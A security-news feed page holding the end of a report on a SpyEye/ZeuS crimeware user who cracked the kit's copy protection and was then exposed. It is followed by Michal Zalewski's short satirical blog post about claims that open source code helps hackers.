The same day Raff’s post went up, a source forwarded me a link to a video posted to a popular hacker forum by a SpyZeuS customer who was using an even newer version, v. 1.3.09 Beta. The video (which the poster starts with a typo confusing ZeuS and SpyEye) shows how this user managed to hack the protection scheme built into SpyEye that is supposed to prevent buyers from making unauthorized copies of the crimeware package. Very shortly after posting that video, the user who recorded it had his forum account compromised and his personal and financial details posted online.

Update, 10:26 a.m.: Added response from Trusteer. Also, a previous version of this post incorrectly attributed a McAfee blog post to Trend Micro. The above text has been corrected.

lcamtuf's blog: The dreaded curse of openness

This post was syndicated from: lcamtuf's blog and was written by: Michal Zalewski. Original post: at lcamtuf's blog

Several weeks ago, the chairman of Trend Micro had this to say:

“Android is open-source, which means the hacker can also understand the underlying architecture and source code. We have to give credit to Apple, because they are very careful about it. It’s impossible for certain types of viruses to operate on the iPhone.”

Now that Kaspersky has, ahem, joined the open source crowd – I worry that hackers may soon be able to understand the operation of anti-virus software as well. And beyond that unthinkable point, only darkness looms.
